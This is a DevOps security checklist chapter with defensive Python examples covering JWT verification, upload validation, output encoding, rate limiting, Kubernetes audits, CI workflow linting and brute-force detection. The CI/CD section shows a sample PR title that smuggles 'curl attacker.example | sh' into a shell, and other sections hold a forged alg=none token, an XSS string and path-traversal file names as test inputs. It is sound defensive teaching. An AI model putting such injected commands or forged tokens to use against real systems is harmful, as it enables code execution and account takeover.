Chapter 35: Security checklist for DevOps
Deployment checklist
Authentication & Authorization:
□ Passwords hashed with bcrypt (cost factor >= 12) or argon2id with memory-hard parameters (OWASP baseline: 19 MiB memory, 2 iterations, 1 lane); never a plain or salted fast hash such as SHA-256
□ MFA enabled for admin accounts
□ Session tokens: generated from a CSPRNG, >= 128 bits of entropy, rotated on login
□ Cookie attributes: HttpOnly, Secure, SameSite=Strict/Lax
□ JWT: the server pins the accepted algorithm (reject "none" and any alg the token itself asks for), verifies the signature, checks exp (and iss/aud where issued)
□ Access control: deny by default, enforced server-side on every request (never only in the UI)
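The JWT item above is where most token bugs live: trusting the `alg` header, skipping the signature when it is empty, or never looking at `exp`. The following is an added example, not code from this checklist, showing a minimal HS256 verifier that pins the algorithm, compares the signature in constant time and enforces exp/nbf. `DEMO_KEY`, the claims and the `forge_payload` helper are constructed for the demonstration.

```python
# Added example (not part of the checklist): a minimal HS256 JWT verifier that
# pins the algorithm, rejects "alg": "none", checks the signature in constant
# time and validates exp/nbf. Key and claims below are constructed for the demo.
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

EXPECTED_ALG = "HS256"   # decided by the server, never read from the token
DEMO_KEY = b"constructed-demo-key-not-for-production"


def _b64url_decode(data: str) -> bytes:
    # JWT base64url drops the padding; restore it before decoding
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def issue_token(claims: dict, key: bytes, alg: str = "HS256") -> str:
    """Issue a token. `alg` is a parameter only so a forged 'none' token can be built."""
    header = _b64url_encode(json.dumps({"alg": alg, "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    if alg == "none":
        return f"{header}.{payload}."          # what an attacker would send
    sig = hmac.new(key, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(sig)}"


def forge_payload(token: str, claims: dict) -> str:
    """Attacker's move: swap the payload and keep the old signature."""
    header_b64, _, sig_b64 = token.split(".")
    return f"{header_b64}.{_b64url_encode(json.dumps(claims).encode())}.{sig_b64}"


def verify_token(token: str, key: bytes, now: Optional[float] = None, leeway: int = 30) -> dict:
    """Return the claims if the token is valid, otherwise raise ValueError."""
    now = time.time() if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("malformed token")
    header_b64, payload_b64, sig_b64 = parts
    header = json.loads(_b64url_decode(header_b64))
    # 1. Algorithm pinning: the token may claim "none" or "RS256"; we only accept ours.
    if header.get("alg") != EXPECTED_ALG:
        raise ValueError(f"unexpected alg {header.get('alg')!r}")
    # 2. Signature over the exact bytes received, compared in constant time.
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):
        raise ValueError("bad signature")
    claims = json.loads(_b64url_decode(payload_b64))
    # 3. Time claims: exp is mandatory, nbf optional, small clock-skew leeway.
    if not isinstance(claims.get("exp"), (int, float)):
        raise ValueError("missing exp")
    if now > claims["exp"] + leeway:
        raise ValueError("token expired")
    if now + leeway < claims.get("nbf", 0):
        raise ValueError("token not yet valid")
    return claims


def rejection_reason(token: str, key: bytes, now: float) -> Optional[str]:
    """None if the token verifies, otherwise the reason it was rejected."""
    try:
        verify_token(token, key, now=now)
        return None
    except ValueError as exc:
        return str(exc)


if __name__ == "__main__":
    good = issue_token({"sub": "alice", "exp": 2000}, DEMO_KEY)
    print("valid:", verify_token(good, DEMO_KEY, now=1000))
    print("expired:", rejection_reason(good, DEMO_KEY, 3000))
    print("alg=none:", rejection_reason(issue_token({"sub": "admin", "exp": 2000}, DEMO_KEY, alg="none"), DEMO_KEY, 1000))
    print("forged payload:", rejection_reason(forge_payload(good, {"sub": "admin", "exp": 2000}), DEMO_KEY, 1000))
```

The order of the checks matters: the algorithm is compared against a server-side constant before the signature is even computed, so an `alg: none` token never reaches a code path that could treat an empty signature as valid. In production use a maintained library and configure it with the same three constraints (fixed algorithm list, mandatory signature, mandatory exp).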
Input Validation:
□ All user inputs validated server-side
□ Parameterized queries (SQL)
□ XML parser: disable external entities
□ File upload: validate content, not extension/Content-Type
□ Filename sanitized before filesystem use
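The two file-upload items above (validate content, not extension or Content-Type; sanitize the filename) are easiest to get wrong together, because the extension on disk is usually derived from the client's name. This added example, not code from the checklist, sniffs the type from the bytes, assigns the extension itself and reduces the client name to a single safe path component. The allowlist in `MAGIC`, the size limit and the sample inputs are constructed for the demo.

```python
# Added example (not part of the checklist): upload handling that trusts neither
# the file extension nor the client's Content-Type, only the bytes, and that
# sanitizes the filename before it touches the filesystem. The allowlist of
# types and the sample inputs are constructed for the demo.
import os
import re
import unicodedata
from typing import Optional, Tuple

# Accepted types: identified by magic bytes, with the extension *we* assign.
MAGIC = {
    "image/png": (b"\x89PNG\r\n\x1a\n", ".png"),
    "image/jpeg": (b"\xff\xd8\xff", ".jpg"),
    "application/pdf": (b"%PDF-", ".pdf"),
}
MAX_NAME_LEN = 100
MAX_SIZE = 10 * 1024 * 1024   # 10 MiB, demo limit


def sniff_type(data: bytes) -> Optional[str]:
    """Identify the type from content; None if it is not on the allowlist."""
    for mime, (magic, _ext) in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def sanitize_filename(name: str) -> str:
    """Reduce a client-supplied name to a safe single path component."""
    # Keep only the last path component: "../../etc/passwd" and "C:\x\y.png" cannot escape the upload dir.
    name = name.replace("\\", "/").split("/")[-1]
    name = unicodedata.normalize("NFKC", name)
    name = re.sub(r"[^A-Za-z0-9._-]", "_", name)   # ASCII allowlist: no spaces, no control chars
    name = name.strip("._")                         # no hidden files, no "..", no trailing dot (Windows)
    if not name:
        raise ValueError("empty filename after sanitizing")
    return name[:MAX_NAME_LEN]


def validate_upload(filename: str, declared_type: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, stored_name_or_reason). The declared Content-Type is informational only."""
    if len(data) > MAX_SIZE:
        return False, "file too large"
    sniffed = sniff_type(data)
    if sniffed is None:
        return False, "content is not an allowed type"
    if declared_type != sniffed:
        # Not trusted for the decision, but a mismatch is worth rejecting and logging.
        return False, f"declared {declared_type} but content is {sniffed}"
    try:
        safe = sanitize_filename(filename)
    except ValueError as exc:
        return False, str(exc)
    # Collapse every dot in the stem so "shell.php.png" becomes "shell_php.png": the only
    # extension on disk is the one derived from the sniffed content.
    stem = os.path.splitext(safe)[0].replace(".", "_") or "upload"
    return True, stem + MAGIC[sniffed][1]


def resolve_within(upload_dir: str, stored_name: str) -> str:
    """Final guard before writing: the resolved path must stay under upload_dir."""
    root = os.path.realpath(upload_dir)
    target = os.path.realpath(os.path.join(root, stored_name))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("path escapes upload directory")
    return target


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    print(validate_upload("../shell.php.png", "image/png", png))          # (True, 'shell_php.png')
    print(validate_upload("x.png", "image/png", b"<?php echo 1; ?>"))      # rejected: not an allowed type
    print(validate_upload("x.jpg", "image/jpeg", png))                     # rejected: declared/content mismatch
```

Store the file under the name `validate_upload` returns, outside the web root, and serve it with a fixed Content-Type derived from the sniffed value, never from the original name.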
Output Security:
□ HTML output: context-aware encoding
□ JSON responses: correct Content-Type
□ Security headers: CSP, X-Frame-Options, HSTS, X-Content-Type-Options
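"Context-aware encoding" means the same user string needs a different transformation depending on whether it lands in element text, an attribute, a JavaScript string or a URL parameter; one HTML-escape everywhere is not enough. This added example, not code from the checklist, shows one encoder per context, a tiny template that uses the right one in each slot, and an audit for the four headers listed above. The template and the header sets are constructed for the demo.

```python
# Added example (not part of the checklist): output encoders for the HTML contexts
# a template usually has to fill, plus an audit of the response headers the
# checklist asks for. The page template and header sets are constructed for the demo.
import html
import json
from typing import Dict, List
from urllib.parse import quote

REQUIRED_HEADERS = {
    "Content-Security-Policy",
    "Strict-Transport-Security",
    "X-Content-Type-Options",
    "X-Frame-Options",
}


def encode_for_html(value: str) -> str:
    """Element content: <, >, &, and both quotes become entities."""
    return html.escape(value, quote=True)


def encode_for_attribute(value: str) -> str:
    """Quoted attribute value. The template MUST wrap it in double quotes."""
    return html.escape(value, quote=True)


def encode_for_js_string(value: str) -> str:
    """String literal inside <script>. json.dumps escapes quotes, backslashes, control
    characters and (with ensure_ascii) U+2028/2029; we additionally escape <, > and &
    so the literal can never close the script block or start an entity."""
    return (json.dumps(value)
            .replace("<", "\\u003c")
            .replace(">", "\\u003e")
            .replace("&", "\\u0026"))


def encode_for_url_param(value: str) -> str:
    """Query-string component; everything except unreserved characters is percent-encoded."""
    return quote(value, safe="")


def render_profile(display_name: str, search: str) -> str:
    """A tiny template that uses the right encoder in each context."""
    return (
        f"<h1>Hello, {encode_for_html(display_name)}</h1>\n"
        f'<a href="/search?q={encode_for_url_param(search)}" title="{encode_for_attribute(search)}">again</a>\n'
        f"<script>var lastSearch = {encode_for_js_string(search)};</script>"
    )


def missing_security_headers(headers: Dict[str, str]) -> List[str]:
    """Header names (matched case-insensitively) the response still lacks, plus weak values."""
    present = {k.lower(): v for k, v in headers.items()}
    missing = sorted(h for h in REQUIRED_HEADERS if h.lower() not in present)
    if "x-content-type-options" in present and present["x-content-type-options"].strip().lower() != "nosniff":
        missing.append("X-Content-Type-Options (must be nosniff)")
    return missing


if __name__ == "__main__":
    print(render_profile("<b>Eve</b>", '"><script>alert(1)</script>'))
    print(missing_security_headers({"Content-Type": "text/html"}))
```

The audit function is the deploy-time check for the header item: run it against a real response from staging (for example the headers returned by an HTTP client) rather than against the configuration you believe you shipped, because a proxy or ingress in front of the app can strip or override them.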
API Security:
□ Rate limiting: per-endpoint, per-user
□ Authentication required for sensitive endpoints
□ Mass assignment protection: allowlist of bindable fields (reject, or at least log, anything else in the body)
□ CORS: allowlist specific origins only; never reflect an arbitrary Origin together with Access-Control-Allow-Credentials
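Two of the API items above have small, testable implementations: a limiter keyed by user and endpoint (so one client cannot spend a shared budget and a login endpoint can be far tighter than a read endpoint), and a field allowlist that stops a request body from binding `role` or `is_admin`. The following is an added example, not code from the checklist; the endpoint limits, writable-field set, users and payloads are constructed for the demo.

```python
# Added example (not part of the checklist): a token-bucket limiter keyed by
# (user, endpoint) so one noisy client cannot exhaust a shared budget, and a
# mass-assignment guard that only copies allowlisted fields from a request body.
# Endpoint limits, users and payloads are constructed for the demo.
import time
from typing import Dict, Iterable, List, Optional, Tuple

# endpoint -> (bucket capacity, refill in tokens per second). Sensitive endpoints get tight limits.
ENDPOINT_LIMITS: Dict[str, Tuple[int, float]] = {
    "POST /login": (5, 0.5),         # 5 burst, then one attempt every 2 s
    "POST /password-reset": (3, 0.1),
    "GET /api/items": (100, 50.0),
}
DEFAULT_LIMIT = (30, 10.0)


class TokenBucketLimiter:
    def __init__(self, limits: Dict[str, Tuple[int, float]] = ENDPOINT_LIMITS):
        self.limits = limits
        self._buckets: Dict[Tuple[str, str], Tuple[float, float]] = {}  # key -> (tokens, last_ts)

    def allow(self, user: str, endpoint: str, now: Optional[float] = None) -> bool:
        """True if the request may proceed; one token is spent per request."""
        now = time.monotonic() if now is None else now
        capacity, rate = self.limits.get(endpoint, DEFAULT_LIMIT)
        key = (user, endpoint)
        tokens, last = self._buckets.get(key, (float(capacity), now))
        tokens = min(float(capacity), tokens + (now - last) * rate)   # refill since last call
        if tokens >= 1.0:
            self._buckets[key] = (tokens - 1.0, now)
            return True
        self._buckets[key] = (tokens, now)
        return False


# Mass assignment: the client may send {"role": "admin"}; the model must not bind it.
USER_WRITABLE = frozenset({"display_name", "email", "locale"})


def filter_assignable(payload: Dict[str, object],
                      allowed: Iterable[str] = USER_WRITABLE) -> Tuple[Dict[str, object], List[str]]:
    """Split a request body into the fields we will bind and the ones we refuse."""
    allowed = frozenset(allowed)
    accepted = {k: v for k, v in payload.items() if k in allowed}
    rejected = sorted(k for k in payload if k not in allowed)
    return accepted, rejected


def update_profile(record: Dict[str, object], payload: Dict[str, object]) -> Dict[str, object]:
    """Apply an update; reject (rather than silently drop) attempts to set protected fields."""
    accepted, rejected = filter_assignable(payload)
    if rejected:
        raise ValueError(f"fields not assignable: {rejected}")
    return {**record, **accepted}


if __name__ == "__main__":
    lim = TokenBucketLimiter()
    print([lim.allow("alice", "POST /login", now=0.0) for _ in range(6)])   # five True, then False
    print(filter_assignable({"display_name": "A", "role": "admin"}))        # ({'display_name': 'A'}, ['role'])
```

Keying the bucket on the authenticated user rather than only on the source IP is what makes the limit "per-user": a NAT gateway with many legitimate users behind it is not throttled as one client, and one user cannot escape the limit by rotating IPs. Unauthenticated endpoints such as login still need an IP-keyed bucket as well.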
Infrastructure:
□ HTTPS enforced (TLS 1.2+)
□ Security headers via server/ingress config
□ WAF configured and tested (confirm it actually blocks, not just logs)
□ Secrets: never hardcoded; loaded from a secrets manager at runtime
□ Least privilege: service accounts, IAM roles, DB users
Container/K8s checklist
Container:
□ Non-root user (runAsNonRoot: true)
□ Read-only filesystem (readOnlyRootFilesystem: true)
□ Drop capabilities (capabilities.drop: [ALL])
□ Resource limits defined
□ No secrets in image layers
□ Image scanned (Trivy)
□ Signed images (cosign)
Kubernetes:
□ RBAC: least privilege
□ Network Policy: default deny
□ Pod Security Standards: Restricted profile
□ Secrets: External Secrets Operator or Vault
□ ServiceAccount: automountServiceAccountToken: false
□ Ingress: allowlist source IPs for admin endpoints
□ No NodePort exposing internal services
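Most of the Container items and the automountServiceAccountToken item above are properties of the Pod spec and can be checked before anything is applied. The block below is an added example, not code from this checklist or from any Kubernetes project: a static audit of a Pod manifest (held as a Python dict, the shape `kubectl get pod -o json` produces) against those items, with a constructed weak manifest and a constructed hardened one. The image digest in the hardened spec is a placeholder. The same rules are what you would express as OPA/Kyverno policies for enforcement at admission time.

```python
# Added example (not part of the checklist): a static audit of a Pod spec against
# the Container and Kubernetes items above (non-root, read-only root FS, drop ALL,
# no privilege escalation, seccomp, limits, no automounted SA token, no host
# namespaces/hostPath, image pinned by digest). Both manifests are constructed;
# the digest is a placeholder. Run it in CI before kubectl apply, or port the
# rules to OPA/Kyverno for enforcement at admission.
from typing import Any, Dict, List

Pod = Dict[str, Any]


def _sc(obj: Dict[str, Any], key: str, default: Any = None) -> Any:
    return (obj.get("securityContext") or {}).get(key, default)


def audit_pod(pod: Pod) -> List[str]:
    """Return human-readable findings; an empty list means the spec passes."""
    findings: List[str] = []
    spec = pod.get("spec", {})
    if spec.get("hostNetwork") or spec.get("hostPID") or spec.get("hostIPC"):
        findings.append("pod shares host namespaces (hostNetwork/hostPID/hostIPC)")
    if spec.get("automountServiceAccountToken", True):
        findings.append("automountServiceAccountToken should be false unless the pod calls the API")
    for vol in spec.get("volumes") or []:
        if "hostPath" in vol:
            findings.append(f"volume {vol.get('name')!r} mounts a hostPath")
    # Pod-level settings apply to every container unless the container overrides them.
    pod_non_root = _sc(spec, "runAsNonRoot")
    pod_seccomp = (_sc(spec, "seccompProfile") or {}).get("type")
    containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
    for c in containers:
        name = c.get("name", "<unnamed>")
        if _sc(c, "privileged"):
            findings.append(f"{name}: privileged container")
        if _sc(c, "runAsNonRoot", pod_non_root) is not True:
            findings.append(f"{name}: runAsNonRoot is not true")
        if _sc(c, "readOnlyRootFilesystem") is not True:
            findings.append(f"{name}: readOnlyRootFilesystem is not true")
        if _sc(c, "allowPrivilegeEscalation") is not False:
            findings.append(f"{name}: allowPrivilegeEscalation is not false")
        seccomp = (_sc(c, "seccompProfile") or {}).get("type", pod_seccomp)
        if seccomp not in ("RuntimeDefault", "Localhost"):
            findings.append(f"{name}: seccompProfile is not RuntimeDefault/Localhost")
        caps = _sc(c, "capabilities") or {}
        if "ALL" not in (caps.get("drop") or []):
            findings.append(f"{name}: capabilities.drop does not include ALL")
        extra = set(caps.get("add") or []) - {"NET_BIND_SERVICE"}   # the only add the Restricted profile allows
        if extra:
            findings.append(f"{name}: adds capabilities {sorted(extra)}")
        limits = (c.get("resources") or {}).get("limits") or {}
        if "cpu" not in limits or "memory" not in limits:
            findings.append(f"{name}: cpu/memory limits not set")
        image = c.get("image", "")
        if "@sha256:" not in image:
            findings.append(f"{name}: image {image!r} is a mutable tag, pin it by digest")
    return findings


# Constructed "before" manifest: what a bare `kubectl run` style spec looks like.
WEAK_POD: Pod = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "web"},
    "spec": {"containers": [{"name": "web", "image": "nginx:latest"}]},
}

# Constructed hardened manifest (the digest is a placeholder, not a real image).
HARDENED_POD: Pod = {
    "apiVersion": "v1", "kind": "Pod",
    "metadata": {"name": "web"},
    "spec": {
        "automountServiceAccountToken": False,
        "securityContext": {"runAsNonRoot": True, "runAsUser": 10001,
                            "seccompProfile": {"type": "RuntimeDefault"}},
        "containers": [{
            "name": "web",
            "image": "registry.example.com/web@sha256:" + "ab" * 32,
            "securityContext": {
                "readOnlyRootFilesystem": True,
                "allowPrivilegeEscalation": False,
                "capabilities": {"drop": ["ALL"]},
            },
            "resources": {"requests": {"cpu": "100m", "memory": "128Mi"},
                          "limits": {"cpu": "500m", "memory": "256Mi"}},
            "volumeMounts": [{"name": "tmp", "mountPath": "/tmp"}],   # writable scratch for a read-only root FS
        }],
        "volumes": [{"name": "tmp", "emptyDir": {}}],
    },
}


if __name__ == "__main__":
    for finding in audit_pod(WEAK_POD):
        print("WEAK:", finding)
    print("HARDENED:", audit_pod(HARDENED_POD) or "no findings")
```

Note the `emptyDir` mounted at `/tmp` in the hardened spec: `readOnlyRootFilesystem: true` breaks any process that writes to its image filesystem, so scratch and cache directories have to be mounted explicitly. Image signature verification (cosign) is not something a static check can do, but pinning by digest is the prerequisite for it, which is why the audit flags mutable tags.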
Namespace:
□ Separate namespaces: prod/staging/dev
□ ResourceQuota and LimitRange defined
□ Admission controllers: OPA/Kyverno policies
CI/CD checklist
Pipeline:
□ Secrets in the CI/CD secret store (never in code)
□ Pinned dependency versions (no @latest); pin third-party pipeline actions/plugins too, ideally to a commit SHA
□ SAST in PR checks
□ Dependency scanning (Snyk/Dependabot)
□ Container image scanning
□ DAST after deploy to staging
□ No shell injection in pipeline steps: never interpolate untrusted input (PR titles, branch names, commit messages) directly into shell commands; pass it through environment variables
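The pipeline items on pinning and shell injection can both be linted from the workflow file. The following is an added example, not code from the checklist or from any CI vendor: a small scanner for GitHub Actions workflows that flags (a) event fields an outside contributor controls being interpolated straight into a `run:` step, and (b) `uses:` references not pinned to a commit SHA. The list of untrusted contexts follows GitHub's own hardening guidance; the workflow text is constructed for the demo and its 40-hex SHA is a placeholder, not a real action commit.

```python
# Added example (not part of the checklist): a linter for GitHub Actions workflows
# that flags (a) untrusted event data interpolated straight into a `run:` step,
# the injection the "no shell injection in pipeline steps" item is about, and
# (b) `uses:` references not pinned to a commit SHA. The workflow below is
# constructed and the 40-hex SHA in it is a placeholder, not a real action commit.
import re
from typing import List, Tuple

# Event fields an outside contributor controls (from GitHub's security hardening guidance).
UNTRUSTED_CONTEXTS = [
    "github.event.issue.title", "github.event.issue.body",
    "github.event.pull_request.title", "github.event.pull_request.body",
    "github.event.comment.body", "github.event.review.body",
    "github.event.review_comment.body",
    "github.event.pages.*.page_name",
    "github.event.commits.*.message", "github.event.head_commit.message",
    "github.event.head_commit.author.email", "github.event.head_commit.author.name",
    "github.event.commits.*.author.email", "github.event.commits.*.author.name",
    "github.event.pull_request.head.ref", "github.event.pull_request.head.label",
    "github.event.pull_request.head.repo.default_branch",
    "github.head_ref",
]
# "*" in a pattern stands for one path segment (an array index).
_UNTRUSTED_RE = [re.compile(re.escape(p).replace(r"\*", r"[^.]+") + r"$") for p in UNTRUSTED_CONTEXTS]
EXPR_RE = re.compile(r"\$\{\{\s*(.*?)\s*\}\}")
RUN_RE = re.compile(r"^(?:-\s+)?run:\s*(.*)$")
USES_RE = re.compile(r"^(?:-\s+)?uses:\s*(\S+)")
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


def is_untrusted(expr: str) -> bool:
    return any(rx.match(expr) for rx in _UNTRUSTED_RE)


def _indent(line: str) -> int:
    return len(line) - len(line.lstrip(" "))


def scan_workflow(text: str) -> List[Tuple[int, str]]:
    """Return (line_number, finding) pairs for a workflow file's text."""
    findings: List[Tuple[int, str]] = []
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i]
        stripped = line.strip()
        lineno = i + 1
        m = RUN_RE.match(stripped)
        if m:
            body = m.group(1)
            i += 1
            if body in ("|", "|-", "|+", ">", ">-", ">+", ""):
                # Block scalar: the script is every following line indented deeper than `run:`.
                block = []
                while i < len(lines) and (not lines[i].strip() or _indent(lines[i]) > _indent(line)):
                    block.append(lines[i])
                    i += 1
                body = "\n".join(block)
            for expr in EXPR_RE.findall(body):
                if is_untrusted(expr):
                    findings.append((lineno, f"untrusted input interpolated into run: ${{{{ {expr} }}}}; pass it via env: instead"))
            continue
        u = USES_RE.match(stripped)
        if u:
            ref = u.group(1)
            if not ref.startswith(("./", "docker://")):   # local and docker refs are out of scope here
                version = ref.rsplit("@", 1)[1] if "@" in ref else ""
                if not SHA_RE.match(version):
                    findings.append((lineno, f"uses: {ref} is not pinned to a commit SHA (tags/branches are mutable)"))
        i += 1
    return findings


# Constructed workflow: one injectable step, one safe step, one unpinned and one pinned action.
WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Greet (vulnerable)
        run: echo "PR title: ${{ github.event.pull_request.title }}"
      - name: Greet (safe)
        env:
          TITLE: ${{ github.event.pull_request.title }}
        run: |
          echo "PR title: $TITLE"
      - uses: actions/setup-node@0123456789abcdef0123456789abcdef01234567  # placeholder SHA
"""


if __name__ == "__main__":
    for lineno, finding in scan_workflow(WORKFLOW):
        print(f"line {lineno}: {finding}")
```

Why the safe step is safe: the expression is expanded by the runner into an environment variable before the shell starts, so a title like `"; curl attacker.example | sh; echo "` stays a plain string in `$TITLE`. In the vulnerable step the same title is substituted into the script text and the shell parses it as commands.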
Code Review:
□ Security review checklist for PRs
□ SQL queries: parameterized?
□ User input: validated and sanitized?
□ Secrets: accidentally committed?
□ Dependencies: any new ones with known CVEs?
Monitoring checklist
Logging:
□ Auth events logged (success/failure)
□ Access control denials logged
□ Sensitive data NOT logged (passwords, tokens, PII)
□ Centralized logging (ELK/Loki)
□ Log retention policy defined
Alerting:
□ Brute force detection
□ Anomalous data access
□ Failed auth spike
□ New admin user created
□ Critical resource deleted
□ Cert expiry warning (30/14/7 days)
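The "brute force detection" and "failed auth spike" alerts above are the same sliding-window computation applied to different keys, and the common variant the list does not name, password spraying (one source, many accounts, few attempts each), falls out of the same loop. The block below is an added example, not code from the checklist or from any SIEM: three detectors run over constructed auth log lines. The line format and thresholds are invented for the demo; map your own log fields into `parse()`.

```python
# Added example (not part of the checklist): the "brute force", "failed auth spike"
# and password-spray alerts from the list above, run over constructed auth log
# lines (the format is invented for the demo; map your own fields into parse()).
import re
from collections import defaultdict, deque
from datetime import datetime
from typing import Deque, Dict, Iterable, List

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<event>auth_success|auth_failure) user=(?P<user>\S+) ip=(?P<ip>\S+)$"
)


def parse(line: str) -> Dict[str, object]:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    ev: Dict[str, object] = m.groupdict()
    # The "Z" suffix is not accepted by fromisoformat before Python 3.11.
    ev["t"] = datetime.fromisoformat(str(ev["ts"]).replace("Z", "+00:00")).timestamp()
    return ev


def detect(lines: Iterable[str], window: int = 60, per_ip_failures: int = 5,
           spray_users: int = 3, global_failures: int = 8) -> List[Dict[str, object]]:
    """Sliding-window detectors; each (detector, key) alerts once per run."""
    alerts: List[Dict[str, object]] = []
    fired = set()
    fails_by_ip: Dict[str, Deque[float]] = defaultdict(deque)
    users_by_ip: Dict[str, Deque[tuple]] = defaultdict(deque)
    all_fails: Deque[float] = deque()

    def alert(kind: str, key: str, ev: Dict[str, object], detail: str) -> None:
        if (kind, key) not in fired:
            fired.add((kind, key))
            alerts.append({"type": kind, "key": key, "at": ev["ts"], "detail": detail})

    for ev in map(parse, lines):
        if ev["event"] != "auth_failure":
            continue   # successes are logged too (checklist), but these detectors count failures only
        t, ip, user = ev["t"], str(ev["ip"]), str(ev["user"])
        # 1. Brute force: many failures from one source inside the window.
        q = fails_by_ip[ip]
        q.append(t)
        while q and q[0] < t - window:
            q.popleft()
        if len(q) >= per_ip_failures:
            alert("brute_force", ip, ev, f"{len(q)} failures in {window}s")
        # 2. Password spray: one source, many distinct accounts.
        uq = users_by_ip[ip]
        uq.append((t, user))
        while uq and uq[0][0] < t - window:
            uq.popleft()
        distinct = {u for _, u in uq}
        if len(distinct) >= spray_users:
            alert("password_spray", ip, ev, f"{len(distinct)} accounts: {sorted(distinct)}")
        # 3. Failed-auth spike: failures across all sources exceed the baseline.
        all_fails.append(t)
        while all_fails and all_fails[0] < t - window:
            all_fails.popleft()
        if len(all_fails) >= global_failures:
            alert("failure_spike", "*", ev, f"{len(all_fails)} failures in {window}s")
    return alerts


# Constructed sample: one host hammering alice, another spraying several accounts.
SAMPLE_LOG = """\
2024-05-01T10:00:00Z auth_failure user=alice ip=203.0.113.5
2024-05-01T10:00:05Z auth_failure user=alice ip=203.0.113.5
2024-05-01T10:00:10Z auth_success user=bob ip=198.51.100.9
2024-05-01T10:00:12Z auth_failure user=alice ip=203.0.113.5
2024-05-01T10:00:15Z auth_failure user=bob ip=198.51.100.7
2024-05-01T10:00:18Z auth_failure user=alice ip=203.0.113.5
2024-05-01T10:00:20Z auth_failure user=carol ip=198.51.100.7
2024-05-01T10:00:25Z auth_failure user=alice ip=203.0.113.5
2024-05-01T10:00:28Z auth_failure user=dave ip=198.51.100.7
2024-05-01T10:00:31Z auth_failure user=alice ip=203.0.113.5
2024-05-01T10:00:40Z auth_failure user=erin ip=198.51.100.7
"""


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(a)
```

Two design points worth carrying into a real rule set: the log line carries the username even on failure (the checklist asks for auth events to be logged, and without the account you cannot tell a spray from a brute force), and each detector fires once per key per window rather than once per matching line, otherwise a sustained attack becomes an alert storm.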
Monitoring:
□ WAF alerts reviewed
□ CVE alerts for dependencies
□ Cloud security alerts (GuardDuty/Security Hub)
□ Penetration testing: annual minimum
□ Vulnerability scanning: monthly
Summary
- Security is not a one-time task; it is a continuous process.
- Shift left: integrate security from development onward instead of waiting for production.
- Automation: SAST/DAST in CI/CD, automated vulnerability scanning.
- Defense in depth: never depend on a single layer of protection.
- Incident response: have a plan, test the plan, improve it after every incident.
- Monitoring: no logging means no visibility when you are attacked.